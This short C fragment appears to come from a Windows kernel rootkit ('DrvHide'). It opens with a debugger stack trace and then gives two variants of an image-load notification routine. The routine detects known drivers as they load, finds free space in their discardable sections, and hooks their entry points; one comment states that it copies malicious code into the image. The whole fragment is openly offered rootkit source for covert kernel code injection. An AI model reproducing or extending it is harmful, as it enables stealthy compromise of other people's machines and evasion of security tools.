/* kd> kb ChildEBP RetAddr Args to Child f8afdaa8 805c62ae f8afdcf0 00000000 f8afdb44 DrvHide!LoadImageNotify+0x10 f8afdac8 805a4159 f8afdcf0 00000000 f8afdb44 nt!PsCallImageNotifyRoutines+0x36 f8afdc6c 80576483 f8afdcf0 00000000 00000000 nt!MmLoadSystemImage+0x9e5 f8afdd4c 8057688f 80000378 00000001 00000000 nt!IopLoadDriver+0x371 f8afdd74 80534c02 80000378 00000000 823c63c8 nt!IopLoadUnloadDriver+0x45 f8afddac 805c6160 b286ecf4 00000000 00000000 nt!ExpWorkerThread+0x100 f8afdddc 80541dd2 80534b02 00000001 00000000 nt!PspSystemThreadStartup+0x34 00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16 */ VOID LoadImageNotify( PUNICODE_STRING FullImageName, HANDLE ProcessId, // where image is mapped PIMAGE_INFO ImageInfo) { KeWaitForMutexObject(&m_GlobalMutex, Executive, KernelMode, FALSE, NULL); // check for kernel driver if (ProcessId == 0 && ImageInfo->SystemModeImage && !m_bFreeAreaFound && IsKnownDriver(FullImageName)) { PVOID TargetImageBase = ImageInfo->ImageBase; ULONG TargetImageSize = ImageInfo->ImageSize; DbgMsg( __FILE__, __LINE__, "%d '%wZ' is at "IFMT", size: %d\n", PsGetCurrentProcessId(), FullImageName, TargetImageBase, TargetImageSize ); // check for free area at the image discardable sections if (m_bFreeAreaFound = CheckForFreeArea(TargetImageBase, &m_FreeAreaRVA, &m_FreeAreaLength)) { m_FreeAreaVA = RVATOVA(TargetImageBase, m_FreeAreaRVA); DbgMsg(__FILE__, __LINE__, "Free area found!\n"); // hook image entry point HookImageEntry(TargetImageBase); } } KeReleaseMutex(&m_GlobalMutex, FALSE); }
VOID LoadImageNotify( PUNICODE_STRING FullImageName, HANDLE ProcessId, // where image is mapped PIMAGE_INFO ImageInfo) { if (m_FreeAreaFound) { return; } // check for kernel driver if (ProcessId == 0 && ImageInfo->SystemModeImage) { BOOLEAN bImageFound = FALSE; PVOID TargetImageBase = ImageInfo->ImageBase; ULONG TargetImageSize = ImageInfo->ImageSize; DbgMsg( __FUNCTION__"(): '%wZ' is at "IFMT", size=%d\n", FullImageName, TargetImageBase, TargetImageSize ); // check for the known image for (ULONG i = 0; i < sizeof(m_Images) / sizeof(PWSTR); i++) { UNICODE_STRING usName; RtlInitUnicodeString(&usName, m_Images[i]); if (EqualUnicodeString_r(FullImageName, &usName, TRUE)) { bImageFound = TRUE; break; } } if (bImageFound) { // check for the free space in image discardable sections ULONG FreeAreaRVA = 0, FreeAreaLength = 0; if (CheckForFreeArea(TargetImageBase, &FreeAreaRVA, &FreeAreaLength)) { // copy malicious code into this image m_FreeAreaFound = RVATOVA(TargetImageBase, FreeAreaRVA); HookImageEntry(TargetImageBase); } } } }